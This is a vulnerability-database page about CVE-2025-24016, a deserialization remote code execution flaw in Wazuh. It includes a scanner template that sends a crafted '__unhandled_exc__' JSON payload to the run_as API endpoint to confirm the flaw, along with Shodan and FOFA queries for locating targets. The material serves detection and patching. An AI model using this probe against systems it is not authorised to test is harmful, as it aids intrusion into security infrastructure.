| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Wazuh | 13 Feb 202506:38 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Wazuh | 13 Jul 202523:56 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Wazuh | 10 Jun 202518:54 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Wazuh | 16 Feb 202511:01 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Wazuh | 10 Jun 202521:07 | – | githubexploit | |
| CVE-2025-24016 | 10 Feb 202500:00 | – | attackerkb | |
| The vulnerability of the “as_wazuh_object” function in the Wazuh intrusion detection and prevention system allows a perpetrator to execute arbitrary code. | 12 Feb 202500:00 | – | bdu_fstec | |
| CVE-2025-24016 | 10 Feb 202517:01 | – | circl | |
| Wazuh Server Deserialization of Untrusted Data Vulnerability | 10 Jun 202500:00 | – | cisa_kev | |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 10 Jun 202512:00 | – | cisa |
id: CVE-2025-24016
info:
name: Wazuh - Unsafe Deserialization Remote Code Execution
author: Hüseyin TINTAŞ,ritikchaddha
severity: critical
description: |
A critical Remote Code Execution (RCE) vulnerability exists in Wazuh server versions >= 4.4.0 and < 4.9.1. The vulnerability occurs due to unsafe deserialization in the wazuh-manager package, specifically in the DistributedAPI where parameters are serialized as JSON and deserialized using as_wazuh_object in the framework/wazuh/core/cluster/common.py file. An attacker with API access can exploit this vulnerability by injecting an unsanitized dictionary into DAPI requests, leading to arbitrary Python code execution.
impact: |
Successful exploitation allows attackers to execute arbitrary code on the Wazuh server with the privileges of the wazuh-manager process. This can lead to complete system compromise, data exfiltration, lateral movement within the network, and potential denial of service conditions.
remediation: |
Upgrade to Wazuh version >= 4.9.1 where this vulnerability has been patched. If immediate upgrade is not possible: Restrict API access to trusted IP addresses only, implement network segmentation to isolate Wazuh servers, monitor for suspicious API requests to the /security/user/authenticate/run_as endpoint, and consider implementing a Web Application Firewall (WAF) to filter malicious requests.
reference:
- https://github.com/MuhammadWaseem29/CVE-2025-24016
- https://github.com/wazuh/wazuh/security/advisories/GHSA-hcrc-79hj-m3qh
- https://nvd.nist.gov/vuln/detail/CVE-2025-24016
classification:
epss-score: 0.92579
epss-percentile: 0.99814
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.9
cve-id: CVE-2025-24016
cwe-id: CWE-502
cpe: cpe:2.3:a:wazuh:wazuh:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: wazuh
product: wazuh
shodan-query: title:"Wazuh"
fofa-query: app="Wazuh"
tags: cve,cve2025,wazuh,deserialization,rce,authenticated,kev,vkev,vuln
flow: http(1) && http(2)
variables:
payload: '{"__unhandled_exc__":{"__class__": "NotARealClass", "__args__": []}}'
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: word
part: body
words:
- "NameError"
negative: true
internal: true
- raw:
- |
POST /security/user/authenticate/run_as HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Authorization: Basic {{base64(username + ':' + password)}}
{{payload}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "NameError"
- type: status
status:
- 500
# digest: 4b0a00483046022100d4e57457296c5d16df655cc0470076811726cd8aa99c26c464ea33cb0d10c9ee022100dd484bca54bed26460ea6bd5005bcf3d1650700f90ecef73822d543a49b2ec04:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation